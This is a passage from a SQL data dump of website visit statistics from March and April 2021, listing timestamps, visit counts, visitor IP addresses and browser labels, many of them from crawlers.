1616267277,1,1,0,0,'173.252.111.117','other'),(552571,1616267279,1,1,0,0,'173.252.111.15','other'),(552572,1616272310,5,5,0,0,'159.65.4.35','other'),(552573,1616279693,2,2,0,0,'23.228.109.147','chrome'),(552574,1616281561,1,1,0,0,'23.228.109.147','chrome'),(552575,1616282924,1,1,0,0,'206.189.85.88','firefox'),(552576,1616282954,1,1,0,0,'188.166.214.213','firefox'),(552577,1616298312,1,1,0,0,'66.249.66.93','chrome'),(552578,1616302948,1,1,0,0,'66.220.149.10','other'),(552579,1616303319,1,0,1,0,'66.249.66.92',''),(552580,1616306091,1,0,1,0,'66.249.66.93',''),(552581,1616315754,1,1,0,0,'185.237.217.11','chrome'),(552582,1616316214,1,1,0,0,'173.252.111.3','other'),(552583,1616316215,1,1,0,0,'173.252.111.113','other'),(552585,1616316216,1,1,0,0,'173.252.111.21','other'),(552587,1616316217,2,2,0,0,'173.252.111.10','other'),(552588,1616316223,1,1,0,0,'31.13.127.18','other'),(552589,1616316232,1,1,0,0,'173.252.111.6','other'),(552591,1616316242,2,2,0,0,'66.220.149.36','other'),(552592,1616316702,1,1,0,0,'173.252.111.11','other'),(552593,1616316703,2,2,0,0,'173.252.111.2','other'),(552594,1616317432,1,1,0,0,'185.237.217.11','chrome'),(552595,1616317520,1,1,0,0,'173.252.111.17','other'),(552596,1616317521,1,1,0,0,'173.252.111.20','other'),(552597,1616317523,1,1,0,0,'173.252.111.4','other'),(552598,1616317524,1,1,0,0,'173.252.111.22','other'),(552599,1616317531,1,1,0,0,'69.171.251.2','other'),(552600,1616317532,2,2,0,0,'173.252.111.13','other'),(552601,1616317533,1,1,0,0,'173.252.87.19','other'),(552602,1616317534,2,2,0,0,'173.252.111.9','other'),(552603,1616317538,1,1,0,0,'93.77.54.82','chrome'),(552604,1616317588,1,1,0,0,'173.252.87.5','other'),(552605,1616317665,1,1,0,0,'93.73.113.14','chrome'),(552606,1616317679,1,1,0,0,'195.114.97.71','chrome'),(552607,1616317761,1,1,0,0,'188.163.32.24','chrome'),(552608,1616317820,1,1,0,0,'185.237.217.17','other'),(552609,1616317924,1,1,0,0,'46.211.77.120','chrome'),(552610,1616317938,1,1,0,0,'212.113.42.105','chrome'),(552611,1616317942,1,1,0,0,'173.252.111.5','other'),(552612,1616318032,1,1,0,0,'31.13.127.9','other'),(552613,1616318073,1,1,0,0,'91.196.178.8','chrome'),(552614,1616318707,2,2,0,0,'185.237.217.11','chrome'),(552615,1616319084,1,1,0,0,'94.153.15.28','chrome'),(552616,1616319160,1,1,0,0,'212.113.42.105','chrome'),(552617,1616319544,1,1,0,0,'46.211.29.97','chrome'),(552618,1616319681,1,1,0,0,'194.44.105.252','chrome'),(552619,1616319736,1,1,0,0,'128.124.41.198','chrome'),(552620,1616319779,1,1,0,0,'173.252.111.18','other'),(552621,1616319780,2,2,0,0,'173.252.111.24','other'),(552622,1616319951,1,1,0,0,'173.252.111.10','other'),(552623,1616319953,1,1,0,0,'66.220.149.39','other'),(552624,1616319958,2,2,0,0,'173.252.111.22','other'),(552625,1616320247,1,1,0,0,'91.196.178.11','chrome'),(552626,1616320255,1,1,0,0,'37.54.20.16','chrome'),(552627,1616320877,1,1,0,0,'95.133.193.210','chrome'),(552628,1616321391,1,1,0,0,'185.237.217.11','chrome'),(552629,1616321926,1,1,0,0,'69.171.251.22','other'),(552630,1616321928,1,1,0,0,'185.237.217.18','chrome'),(552631,1616322546,1,1,0,0,'46.211.41.170','chrome'),(552632,1616323244,1,1,0,0,'91.231.42.119','other'),(552633,1616323385,1,1,0,0,'95.132.23.55','chrome'),(552634,1616323589,1,1,0,0,'176.118.53.149','chrome'),(552635,1616324106,1,1,0,0,'193.194.124.41','chrome'),(552636,1616324385,1,1,0,0,'91.196.178.37','chrome'),(552637,1616324394,1,1,0,0,'31.13.127.14','other'),(552638,1616324880,4,4,0,0,'23.228.109.147','chrome'),(552639,1616325008,1,1,0,0,'128.124.212.139','chrome'),(552640,1616325317,2,2,0,0,'173.252.111.9','other'),(552641,1616325320,1,1,0,0,'176.125.61.64','chrome'),(552642,1616325655,1,1,0,0,'94.153.28.8','other'),(552643,1616325710,1,1,0,0,'91.196.178.90','chrome'),(552644,1616325936,1,1,0,0,'173.252.95.9','other'),(552646,1616325937,1,1,0,0,'173.252.95.22','other'),(552647,1616325947,1,1,0,0,'188.163.32.150','chrome'),(552648,1616325978,1,1,0,0,'66.220.149.13','other'),(552649,1616326128,1,1,0,0,'185.237.217.0','chrome'),(552650,1616326367,2,2,0,0,'31.13.127.111','other'),(552651,1616326396,2,2,0,0,'31.13.127.118','other'),(552653,1616326397,1,1,0,0,'31.13.127.116','other'),(552656,1616326405,1,1,0,0,'31.13.127.10','other'),(552657,1616326404,1,1,0,0,'46.200.169.249','chrome'),(552658,1616326414,1,1,0,0,'31.13.127.1','other'),(552659,1616326560,1,1,0,0,'91.210.251.79','chrome'),(552660,1616328007,1,1,0,0,'46.211.64.227','chrome'),(552661,1616328453,1,1,0,0,'178.133.185.196','chrome'),(552662,1616329148,1,1,0,0,'185.237.217.11','chrome'),(552663,1616330102,1,1,0,0,'46.204.16.93','chrome'),(552664,1616331084,1,1,0,0,'31.13.115.3','other'),(552665,1616332901,1,1,0,0,'91.196.178.77','chrome'),(552666,1616333542,1,1,0,0,'173.252.111.17','other'),(552667,1616333547,2,2,0,0,'173.252.127.6','other'),(552668,1616333551,1,1,0,0,'173.252.127.7','other'),(552669,1616334470,1,1,0,0,'91.196.178.170','chrome'),(552670,1616334494,1,1,0,0,'31.13.115.23','other'),(552671,1616335929,1,1,0,0,'91.196.178.60','other'),(552672,1616337507,1,1,0,0,'185.177.190.226','chrome'),(552673,1616338044,1,1,0,0,'37.52.20.167','firefox'),(552674,1616338060,1,1,0,0,'66.220.149.36','other'),(552675,1616338901,1,1,0,0,'91.196.178.186','chrome'),(552676,1616338943,1,1,0,0,'173.252.95.3','other'),(552677,1616339236,1,1,0,0,'31.13.127.15','other'),(552678,1616339394,1,1,0,0,'185.237.217.7','firefox'),(552679,1616339846,1,1,0,0,'185.237.217.11','chrome'),(552680,1616340056,1,1,0,0,'176.59.56.216','chrome'),(552681,1616340707,1,1,0,0,'66.220.149.34','other'),(552682,1616341053,1,1,0,0,'31.13.115.15','other'),(552683,1616341504,1,1,0,0,'185.237.217.30','other'),(552684,1616348044,1,1,0,0,'173.252.127.23','other'),(552685,1616348069,1,1,0,0,'31.13.127.15','other'),(552686,1616349137,1,1,0,0,'173.252.127.5','other'),(552687,1616349138,2,2,0,0,'173.252.127.28','other'),(552690,1616349802,1,1,0,0,'185.237.217.11','chrome'),(552691,1616349995,1,1,0,0,'173.252.95.23','other'),(552692,1616352688,1,1,0,0,'173.252.95.19','other'),(552693,1616355766,1,1,0,0,'66.220.149.34','other'),(552695,1616356079,1,1,0,0,'193.56.148.105','chrome'),(552696,1616356101,1,1,0,0,'173.252.95.17','other'),(552697,1616358145,1,1,0,0,'188.147.5.4','chrome'),(552698,1616359311,1,1,0,0,'46.133.227.215','chrome'),(552699,1616359841,1,1,0,0,'173.252.127.1','other'),(552700,1616361270,1,1,0,0,'185.17.124.29','chrome'),(552701,1616364891,3,3,0,0,'23.228.109.147','chrome'),(552702,1616365449,1,1,0,0,'185.42.128.20','chrome'),(552703,1616365718,1,1,0,0,'31.13.127.118','other'),(552704,1616368707,1,1,0,0,'69.115.55.74','chrome'),(552705,1616370864,1,1,0,0,'66.220.149.22','other'),(552706,1616371059,1,0,1,0,'66.249.75.85',''),(552707,1616375217,1,1,0,0,'69.115.55.74','chrome'),(552708,1616384374,1,1,0,0,'207.244.224.193','firefox'),(552709,1616384389,1,1,0,0,'125.99.173.45','firefox'),(552710,1616386012,1,1,0,0,'31.13.127.111','other'),(552711,1616386772,1,1,0,0,'185.237.217.11','chrome'),(552712,1616390059,1,0,1,0,'66.249.75.85',''),(552713,1616394153,1,0,1,0,'66.249.75.86',''),(552714,1616394451,1,1,0,0,'173.252.127.117','other'),(552715,1616396225,1,1,0,0,'46.211.85.236','chrome'),(552716,1616397549,1,1,0,0,'94.153.43.251','other'),(552717,1616397660,1,1,0,0,'31.13.127.113','other'),(552718,1616402679,1,1,0,0,'188.191.67.178','chrome'),(552719,1616403982,1,1,0,0,'173.252.111.13','other'),(552720,1616405052,1,1,0,0,'185.237.217.0','chrome'),(552721,1616406400,1,1,0,0,'173.252.127.2','other'),(552722,1616407090,1,1,0,0,'69.171.251.15','other'),(552723,1616414224,1,0,1,0,'66.249.75.85',''),(552724,1616416720,1,1,0,0,'91.196.178.169','chrome'),(552725,1616420308,1,1,0,0,'185.237.217.11','chrome'),(552726,1616424215,1,1,0,0,'46.211.77.98','chrome'),(552727,1616426710,1,1,0,0,'31.13.127.22','other'),(552728,1616432953,1,1,0,0,'66.249.75.86','chrome'),(552729,1616433480,1,1,0,0,'46.211.33.231','chrome'),(552730,1616441173,1,1,0,0,'83.26.193.140','chrome'),(552731,1616456210,1,1,0,0,'31.13.103.9','other'),(552732,1616462215,1,1,0,0,'69.171.249.8','other'),(552733,1616465143,1,1,0,0,'66.249.75.85','chrome'),(552734,1616466509,1,0,1,0,'66.249.66.92',''),(552735,1616470231,4,4,0,0,'35.197.91.220','other'),(552736,1616470962,1,0,1,0,'66.249.66.91',''),(552737,1616479668,1,0,1,0,'66.249.66.93',''),(552738,1616481948,1,1,0,0,'66.249.66.93','chrome'),(552739,1616483640,1,1,0,0,'185.237.217.11','chrome'),(552740,1616494428,2,2,0,0,'54.189.230.128','firefox'),(552741,1616497689,1,1,0,0,'66.249.66.91','chrome'),(552742,1616499285,1,1,0,0,'5.58.150.82','chrome'),(552743,1616503824,1,1,0,0,'91.196.178.130','chrome'),(552744,1616526503,1,1,0,0,'37.73.15.243','chrome'),(552745,1616546726,1,1,0,0,'66.249.66.93','chrome'),(552746,1616565202,1,0,1,0,'66.249.66.92',''),(552747,1616565336,1,0,1,0,'66.249.66.93',''),(552748,1616568674,1,1,0,0,'37.236.215.32','other'),(552749,1616574917,1,1,0,0,'31.13.115.22','other'),(552750,1616587631,1,1,0,0,'66.249.66.91','chrome'),(552751,1616601005,1,1,0,0,'91.196.178.107','chrome'),(552752,1616605963,1,0,1,0,'66.249.66.92',''),(552753,1616606106,1,1,0,0,'66.249.66.92','chrome'),(552754,1616635634,1,1,0,0,'3.239.181.102','firefox'),(552755,1616643742,1,0,1,0,'66.249.66.91',''),(552756,1616648756,1,1,0,0,'66.249.66.93','chrome'),(552757,1616651254,1,1,0,0,'185.237.217.11','chrome'),(552758,1616651863,1,1,0,0,'66.249.66.93','chrome'),(552759,1616652195,1,0,1,0,'66.249.66.91',''),(552760,1616659413,1,0,1,0,'66.249.65.171',''),(552761,1616661683,1,1,0,0,'209.85.238.79','other'),(552762,1616661919,1,0,1,0,'66.249.65.171',''),(552763,1616671086,1,1,0,0,'66.249.65.171','chrome'),(552764,1616671090,1,0,1,0,'66.249.65.173',''),(552765,1616672047,2,2,0,0,'23.228.109.147','chrome'),(552766,1616672362,1,1,0,0,'66.249.65.171','chrome'),(552767,1616677957,1,0,1,0,'66.249.65.175',''),(552768,1616678291,2,2,0,0,'66.249.65.171','chrome'),(552769,1616680753,1,0,1,0,'66.249.65.175',''),(552770,1616683275,1,0,1,0,'66.249.65.171',''),(552771,1616686699,1,1,0,0,'188.143.235.92','chrome'),(552772,1616690688,1,1,0,0,'188.143.235.92','chrome'),(552773,1616694282,2,2,0,0,'188.143.235.92','chrome'),(552774,1616694359,1,1,0,0,'69.171.251.116','other'),(552775,1616702485,1,1,0,0,'188.143.235.92','chrome'),(552776,1616704538,2,2,0,0,'188.143.235.92','chrome'),(552777,1616706665,1,1,0,0,'188.143.235.92','chrome'),(552778,1616706973,1,1,0,0,'66.220.149.116','other'),(552779,1616708473,1,1,0,0,'34.222.183.47','chrome'),(552780,1616712887,1,1,0,0,'188.143.235.92','chrome'),(552781,1616720286,2,1,1,0,'66.249.65.171',''),(552782,1616720623,1,1,0,0,'66.249.65.173','chrome'),(552783,1616723173,2,2,0,0,'188.143.235.92','chrome'),(552784,1616735048,2,2,0,0,'188.143.235.92','chrome'),(552785,1616735600,1,0,1,0,'66.249.66.91',''),(552786,1616737034,2,2,0,0,'188.143.235.92','chrome'),(552787,1616738339,1,1,0,0,'188.143.235.92','chrome'),(552788,1616738587,1,0,1,0,'66.249.66.91',''),(552789,1616742381,2,2,0,0,'31.13.127.117','other'),(552790,1616742382,1,1,0,0,'31.13.127.13','other'),(552791,1616742383,1,1,0,0,'31.13.127.14','other'),(552792,1616742387,1,1,0,0,'173.252.95.22','other'),(552793,1616744014,1,1,0,0,'188.143.235.92','chrome'),(552794,1616746864,1,1,0,0,'66.249.66.92','chrome'),(552795,1616748409,1,1,0,0,'188.143.235.92','chrome'),(552796,1616749718,1,1,0,0,'66.249.66.91','chrome'),(552797,1616753789,2,2,0,0,'69.171.231.1','other'),(552798,1616753791,1,1,0,0,'69.171.231.113','other'),(552799,1616754206,1,1,0,0,'66.220.149.21','other'),(552800,1616758028,2,2,0,0,'188.143.235.92','chrome'),(552801,1616782017,3,3,0,0,'191.234.176.158','firefox'),(552802,1616783937,1,1,0,0,'173.252.79.7','other'),(552804,1616784079,1,1,0,0,'66.220.149.39','other'),(552805,1616784972,1,1,0,0,'95.46.6.13','chrome'),(552806,1616787774,3,3,0,0,'66.249.66.92','chrome'),(552807,1616787857,1,0,1,0,'66.249.66.93',''),(552808,1616788400,5,5,0,0,'66.249.66.91','chrome'),(552809,1616789064,1,1,0,0,'173.252.127.21','other'),(552810,1616791693,1,1,0,0,'66.249.66.91','chrome'),(552811,1616791700,1,1,0,0,'66.249.66.92','chrome'),(552812,1616794706,3,3,0,0,'43.242.128.31','firefox'),(552813,1616799412,1,1,0,0,'66.249.66.93','chrome'),(552814,1616800510,1,1,0,0,'66.249.66.92','chrome'),(552815,1616806498,1,0,1,0,'66.249.66.91',''),(552816,1616809953,1,0,1,0,'66.249.66.93',''),(552817,1616824197,1,0,1,0,'66.249.66.91',''),(552818,1616824600,1,1,0,0,'185.237.217.11','chrome'),(552819,1616836583,1,1,0,0,'185.237.217.11','chrome'),(552820,1616838149,1,1,0,0,'173.252.111.111','other'),(552821,1616840417,1,1,0,0,'23.228.109.147','chrome'),(552822,1616851615,1,1,0,0,'52.12.70.3','firefox'),(552823,1616855036,1,1,0,0,'31.13.127.120','other'),(552824,1616855137,1,1,0,0,'31.13.127.13','other'),(552826,1616855138,1,1,0,0,'31.13.127.23','other'),(552827,1616855142,1,1,0,0,'69.171.251.23','other'),(552828,1616855145,1,1,0,0,'66.220.149.23','other'),(552829,1616858500,1,1,0,0,'173.252.95.30','other'),(552830,1616883747,1,1,0,0,'69.171.251.3','other'),(552831,1616885052,12,0,12,0,'66.249.66.91',''),(552832,1616885731,1,0,1,0,'66.249.66.93',''),(552833,1616887465,3,0,3,0,'66.249.66.91',''),(552834,1616887541,2,0,2,0,'66.249.66.93',''),(552835,1616888731,2,2,0,0,'188.143.235.92','chrome'),(552836,1616890342,1,1,0,0,'188.143.235.92','chrome'),(552837,1616891280,1,1,0,0,'188.143.235.92','chrome'),(552838,1616895029,1,1,0,0,'188.143.235.92','chrome'),(552839,1616895705,1,1,0,0,'66.249.66.93','chrome'),(552840,1616895876,2,2,0,0,'66.249.66.92','chrome'),(552841,1616895877,1,1,0,0,'66.249.66.91','chrome'),(552842,1616899631,1,1,0,0,'188.143.235.92','chrome'),(552843,1616903692,1,1,0,0,'66.249.66.91','chrome'),(552844,1616903855,1,0,1,0,'66.249.66.92',''),(552845,1616904781,1,1,0,0,'66.249.66.92','chrome'),(552846,1616907011,1,1,0,0,'188.143.235.92','chrome'),(552847,1616908144,2,2,0,0,'188.143.235.92','chrome'),(552848,1616909515,1,1,0,0,'185.237.217.11','chrome'),(552849,1616910606,1,0,1,0,'66.249.66.91',''),(552850,1616913988,1,1,0,0,'46.219.230.157','chrome'),(552851,1616914176,1,0,1,0,'66.249.66.93',''),(552852,1616916362,2,2,0,0,'188.143.235.92','chrome'),(552853,1616922251,3,3,0,0,'188.143.235.92','chrome'),(552854,1616923210,1,1,0,0,'188.143.235.92','chrome'),(552855,1616925610,1,1,0,0,'188.143.235.92','chrome'),(552856,1616928396,2,2,0,0,'137.74.27.104','firefox'),(552857,1616929651,2,2,0,0,'188.143.235.92','chrome'),(552858,1616933106,3,3,0,0,'188.143.235.92','chrome'),(552859,1616936725,2,2,0,0,'188.143.235.92','chrome'),(552860,1616940749,1,1,0,0,'188.143.235.92','chrome'),(552861,1616944128,2,2,0,0,'188.143.235.92','chrome'),(552862,1616946464,1,1,0,0,'188.143.235.92','chrome'),(552863,1616955075,1,1,0,0,'66.249.66.93','chrome'),(552864,1616955679,1,1,0,0,'173.252.111.5','other'),(552865,1616955680,1,1,0,0,'173.252.111.1','other'),(552866,1616955688,1,1,0,0,'173.252.95.7','other'),(552867,1616959461,1,1,0,0,'173.252.111.19','other'),(552868,1616961518,1,0,1,0,'66.249.66.92',''),(552870,1616963371,4,4,0,0,'109.70.104.23','chrome'),(552871,1616964485,1,1,0,0,'66.249.66.92','chrome'),(552872,1616965650,1,1,0,0,'66.249.66.93','chrome'),(552873,1616987792,1,0,1,0,'66.249.66.92',''),(552874,1616996181,1,0,1,0,'66.249.66.93',''),(552875,1617000890,1,1,0,0,'173.252.127.16','other'),(552876,1617004905,2,2,0,0,'66.249.66.93','chrome'),(552877,1617005519,1,1,0,0,'69.171.251.7','other'),(552878,1617006613,1,1,0,0,'66.249.66.92','chrome'),(552879,1617010266,1,0,1,0,'66.249.66.93',''),(552880,1617010273,1,0,1,0,'66.249.66.91',''),(552881,1617012135,1,1,0,0,'66.249.66.92','chrome'),(552882,1617014452,1,0,1,0,'66.249.66.91',''),(552883,1617017978,1,1,0,0,'66.249.66.91','chrome'),(552884,1617024589,2,2,0,0,'66.249.66.93','chrome'),(552885,1617024647,1,1,0,0,'66.249.66.92','chrome'),(552886,1617026715,1,0,1,0,'66.249.66.91',''),(552887,1617028045,1,0,1,0,'66.249.66.93',''),(552888,1617035292,1,1,0,0,'173.252.95.22','other'),(552889,1617041346,1,1,0,0,'178.238.222.45','firefox'),(552890,1617041686,1,1,0,0,'162.219.250.31','firefox'),(552891,1617042270,1,1,0,0,'116.203.84.136','firefox'),(552892,1617046345,1,0,1,0,'66.249.66.93',''),(552893,1617053052,1,1,0,0,'109.70.106.130','other'),(552894,1617063356,1,0,1,0,'66.249.70.43',''),(552895,1617075476,1,1,0,0,'15.223.88.171','other'),(552896,1617078061,1,1,0,0,'66.220.149.16','other'),(552897,1617078109,1,1,0,0,'31.13.127.4','other'),(552898,1617089072,1,0,1,0,'66.249.70.43',''),(552899,1617097883,2,2,0,0,'66.249.70.43','chrome'),(552900,1617097986,2,1,1,0,'66.249.70.45',''),(552901,1617098075,2,2,0,0,'66.249.70.47','chrome'),(552902,1617098944,2,2,0,0,'54.203.73.198','firefox'),(552903,1617105751,1,1,0,0,'185.237.217.11','chrome'),(552904,1617105811,1,1,0,0,'185.237.217.11','other'),(552905,1617106638,1,1,0,0,'94.153.88.118','chrome'),(552906,1617111095,1,1,0,0,'91.196.178.190','chrome'),(552907,1617112704,1,1,0,0,'173.252.111.10','other'),(552908,1617112705,1,1,0,0,'173.252.111.17','other'),(552909,1617122452,1,1,0,0,'173.252.107.15','other'),(552910,1617124175,1,1,0,0,'31.13.103.17','other'),(552911,1617132189,1,0,1,0,'66.249.70.47',''),(552912,1617146724,1,0,1,0,'66.249.70.45',''),(552913,1617148732,1,0,1,0,'66.249.70.43',''),(552914,1617148872,1,1,0,0,'66.249.70.43','chrome'),(552915,1617148931,1,1,0,0,'66.249.70.45','chrome'),(552916,1617174624,1,0,1,0,'66.249.70.45',''),(552917,1617179082,1,1,0,0,'188.163.18.169','chrome'),(552918,1617187188,5,5,0,0,'34.236.55.223','chrome'),(552919,1617189783,2,2,0,0,'66.249.93.54','chrome'),(552920,1617200911,1,1,0,0,'66.249.70.45','chrome'),(552921,1617204045,1,1,0,0,'173.252.95.30','other'),(552922,1617220286,1,0,1,0,'66.249.70.45',''),(552923,1617220722,1,0,1,0,'66.249.70.43',''),(552924,1617224588,1,1,0,0,'173.252.111.10','other'),(552925,1617224589,1,1,0,0,'173.252.111.1','other'),(552926,1617226424,1,1,0,0,'66.249.70.45','chrome'),(552927,1617239607,2,2,0,0,'66.249.70.43','chrome'),(552928,1617256147,1,1,0,0,'185.237.217.11','chrome'),(552929,1617256173,1,1,0,0,'66.249.93.54','chrome'),(552931,1617256181,1,1,0,0,'66.249.70.47','chrome'),(552932,1617260268,1,0,1,0,'66.249.70.43',''),(552933,1617273775,1,1,0,0,'69.171.251.120','other'),(552934,1617287176,1,1,0,0,'216.145.17.190','firefox'),(552935,1617287417,1,1,0,0,'66.249.70.47','chrome'),(552936,1617290789,1,1,0,0,'66.249.70.43','chrome'),(552937,1617294083,3,3,0,0,'103.211.219.226','firefox'),(552938,1617298630,3,3,0,0,'129.146.145.8','firefox'),(552939,1617308173,1,0,1,0,'66.249.70.45',''),(552940,1617330931,1,1,0,0,'66.249.66.93','chrome'),(552941,1617332219,1,0,1,0,'66.249.66.91',''),(552942,1617345775,1,0,1,0,'66.249.66.91',''),(552943,1617355261,1,1,0,0,'173.252.111.119','other'),(552944,1617360243,1,1,0,0,'31.13.103.13','other'),(552945,1617360244,1,1,0,0,'31.13.103.6','other'),(552946,1617373225,1,1,0,0,'31.13.127.26','other'),(552947,1617375817,1,0,1,0,'66.249.66.91',''),(552948,1617383071,1,1,0,0,'31.13.127.10','other'),(552949,1617386694,10,10,0,0,'78.85.180.74','chrome'),(552950,1617399754,1,0,1,0,'66.249.66.93',''),(552951,1617409443,1,1,0,0,'66.249.66.93','chrome'),(552952,1617431378,1,0,1,0,'66.249.66.91',''),(552953,1617431472,1,1,0,0,'31.13.127.120','other'),(552954,1617435109,1,1,0,0,'31.13.127.24','other'),(552955,1617449385,1,1,0,0,'31.13.127.31','other'),(552956,1617461297,1,0,1,0,'66.249.66.92',''),(552957,1617471741,1,1,0,0,'66.249.66.91','chrome'),(552958,1617475260,1,1,0,0,'31.13.127.118','other'),(552959,1617475268,1,1,0,0,'173.252.127.28','other'),(552960,1617476092,1,1,0,0,'192.241.253.220','firefox'),(552961,1617478612,1,1,0,0,'207.244.236.56','firefox'),(552962,1617480489,1,0,1,0,'66.249.66.91',''),(552963,1617486521,1,1,0,0,'46.133.33.170','other'),(552964,1617490717,1,0,1,0,'66.249.66.91',''),(552965,1617497368,1,1,0,0,'66.249.66.93','chrome'),(552966,1617516901,1,0,1,0,'66.249.66.92',''),(552967,1617552967,1,1,0,0,'199.244.88.132','chrome'),(552968,1617557561,1,1,0,0,'34.254.44.235','other'),(552969,1617591225,1,0,1,0,'66.249.66.91',''),(552970,1617596928,1,0,1,0,'66.249.66.91',''),(552971,1617597918,1,1,0,0,'84.17.43.162','msie'),(552972,1617599244,1,1,0,0,'66.249.93.56','chrome'),(552974,1617609492,4,4,0,0,'13.232.96.15','chrome'),(552975,1617633355,1,0,1,0,'66.249.66.92',''),(552976,1617640797,1,1,0,0,'66.249.66.91','chrome'),(552977,1617642141,1,1,0,0,'31.13.127.116','other'),(552978,1617642142,2,2,0,0,'31.13.127.6','other'),(552980,1617644656,1,1,0,0,'66.249.66.92','chrome'),(552981,1617650861,3,3,0,0,'176.98.21.194','chrome'),(552982,1617685625,1,0,1,0,'66.249.66.91',''),(552983,1617703634,1,1,0,0,'138.197.9.170','other'),(552984,1617705117,1,1,0,0,'45.55.61.113','other'),(552985,1617710633,1,1,0,0,'31.13.127.8','other'),(552986,1617710636,1,1,0,0,'66.220.149.48','other'),(552987,1617710713,1,1,0,0,'31.13.127.26','other'),(552988,1617710719,1,1,0,0,'173.252.95.22','other'),(552989,1617710784,1,1,0,0,'31.13.127.18','other'),(552990,1617719018,1,1,0,0,'88.155.40.200','chrome'),(552991,1617724444,5,5,0,0,'13.58.56.77','chrome'),(552992,1617729585,1,1,0,0,'66.249.66.93','chrome'),(552993,1617733020,2,2,0,0,'46.211.39.247','chrome'),(552994,1617737054,2,2,0,0,'54.189.230.128','firefox'),(552995,1617740210,1,0,1,0,'66.249.66.92',''),(552996,1617801562,1,1,0,0,'66.249.66.92','chrome'),(552997,1617805713,5,5,0,0,'34.236.18.197','chrome'),(552998,1617806177,1,0,1,0,'66.249.66.92',''),(552999,1617810671,1,1,0,0,'185.237.217.11','chrome'),(553000,1617810999,1,1,0,0,'31.13.127.6','other'),(553001,1617811113,1,1,0,0,'173.252.95.21','other'),(553002,1617811114,1,1,0,0,'31.13.103.10','other'),(553003,1617811184,1,1,0,0,'31.13.127.118','other'),(553004,1617822666,1,1,0,0,'66.249.66.92','chrome'),(553005,1617827486,1,1,0,0,'66.249.66.92','chrome'),(553006,1617855252,1,0,1,0,'66.249.66.91',''),(553007,1617856440,1,0,1,0,'66.249.66.92',''),(553008,1617858485,1,0,1,0,'66.249.66.93',''),(553009,1617863208,5,5,0,0,'18.229.73.207','chrome'),(553010,1617864807,2,2,0,0,'52.30.100.235','other'),(553011,1617893406,1,1,0,0,'66.249.66.92','chrome'),(553012,1617894127,1,1,0,0,'66.249.66.93','chrome'),(553013,1617896175,1,1,0,0,'66.249.66.91','chrome'),(553014,1617897511,1,1,0,0,'128.124.161.164','other'),(553015,1617917138,1,0,1,0,'66.249.66.88',''),(553016,1617920060,1,1,0,0,'31.13.127.25','other'),(553017,1617927598,1,0,1,0,'66.249.66.87',''),(553018,1617928216,1,1,0,0,'66.249.66.85','chrome'),(553019,1617928899,1,1,0,0,'66.249.66.87','chrome'),(553020,1617941147,1,0,1,0,'66.249.66.89',''),(553021,1617943719,1,0,1,0,'66.249.72.242',''),(553022,1617944998,1,1,0,0,'66.249.70.47','chrome'),(553023,1617947121,1,1,0,0,'66.249.70.47','chrome'),(553024,1617947409,1,0,1,0,'66.249.70.51',''),(553025,1617947659,1,1,0,0,'34.86.35.26','other'),(553026,1617947842,1,1,0,0,'66.249.70.51','chrome'),(553027,1617961735,1,1,0,0,'66.249.70.15','chrome'),(553028,1617982649,1,0,1,0,'66.249.70.47',''),(553029,1617983568,1,1,0,0,'34.86.35.4','other'),(553030,1617983610,1,1,0,0,'157.230.208.124','firefox'),(553031,1617993211,1,1,0,0,'102.130.123.57','firefox'),(553032,1618017579,1,0,1,0,'66.249.70.47',''),(553033,1618021655,1,1,0,0,'66.249.70.49','chrome'),(553034,1618035288,1,1,0,0,'199.244.88.132','chrome'),(553035,1618038526,1,1,0,0,'66.249.70.47','chrome'),(553036,1618039651,1,1,0,0,'34.254.44.235','other'),(553037,1618043346,1,1,0,0,'173.252.127.12','other'),(553038,1618064345,1,1,0,0,'66.249.70.49','chrome'),(553039,1618069278,1,0,1,0,'66.249.70.47',''),(553040,1618080042,1,1,0,0,'173.252.111.14','other'),(553041,1618080365,12,0,12,0,'66.249.70.47',''),(553042,1618080849,1,0,1,0,'66.249.70.49',''),(553043,1618080991,1,0,1,0,'66.249.70.51',''),(553044,1618082496,1,1,0,0,'66.249.70.61','chrome'),(553045,1618082499,1,1,0,0,'66.249.70.34','chrome'),(553046,1618085712,1,1,0,0,'66.249.70.49','chrome'),(553047,1618104251,1,0,1,0,'66.249.70.47',''),(553048,1618105825,3,0,3,0,'66.249.70.51',''),(553049,1618105843,3,0,3,0,'66.249.70.49',''),(553050,1618109034,1,1,0,0,'66.249.70.51','chrome'),(553051,1618110106,1,1,0,0,'66.249.70.51','chrome'),(553052,1618111379,1,0,1,0,'66.249.70.47',''),(553053,1618113114,1,1,0,0,'66.249.70.47','chrome'),(553054,1618143081,1,1,0,0,'66.249.70.47','chrome'),(553055,1618150364,3,3,0,0,'137.74.206.80','firefox'),(553056,1618150972,1,1,0,0,'66.249.70.49','chrome'),(553057,1618151232,1,0,1,0,'66.249.70.51',''),(553058,1618155483,1,0,1,0,'66.249.70.49',''),(553059,1618156813,3,3,0,0,'41.231.122.251','firefox'),(553060,1618170923,1,1,0,0,'173.252.111.18','other'),(553061,1618171732,1,1,0,0,'66.249.70.51','chrome'),(553062,1618175458,1,1,0,0,'66.249.70.49','chrome'),(553063,1618182704,1,1,0,0,'66.249.70.49','chrome'),(553064,1618182752,1,0,1,0,'66.249.70.47',''),(553065,1618189505,1,0,1,0,'66.249.70.49',''),(553066,1618191371,1,0,1,0,'66.249.70.47',''),(553067,1618191471,1,0,1,0,'66.249.70.51',''),(553068,1618194417,1,0,1,0,'66.249.70.49',''),(553069,1618194835,1,1,0,0,'173.252.95.3','other'),(553070,1618195668,1,0,1,0,'66.249.70.47',''),(553071,1618195672,1,1,0,0,'66.249.70.47','chrome'),(553072,1618204888,1,1,0,0,'66.249.70.49','chrome'),(553073,1618209302,1,1,0,0,'66.249.70.51','chrome'),(553074,1618216499,1,1,0,0,'66.249.70.47','chrome'),(553075,1618216953,1,0,1,0,'66.249.70.49',''),(553076,1618224842,1,1,0,0,'31.13.127.10','other'),(553077,1618224843,1,1,0,0,'31.13.127.5','other'),(553078,1618243988,1,0,1,0,'66.249.70.51',''),(553079,1618245724,1,1,0,0,'66.249.70.47','chrome'),(553080,1618248773,1,1,0,0,'66.249.70.49','chrome'),(553081,1618248947,1,0,1,0,'66.249.70.51',''),(553082,1618256834,2,2,0,0,'66.249.70.47','chrome'),(553083,1618268506,1,1,0,0,'107.150.60.36','chrome'),(553084,1618277102,1,1,0,0,'66.249.70.51','chrome'),(553085,1618277867,1,0,1,0,'66.249.70.47',''),(553086,1618284717,1,1,0,0,'66.249.70.51','chrome'),(553087,1618285778,1,0,1,0,'66.249.70.49',''),(553088,1618286783,1,0,1,0,'66.249.70.47',''),(553089,1618287234,1,1,0,0,'66.249.70.51','chrom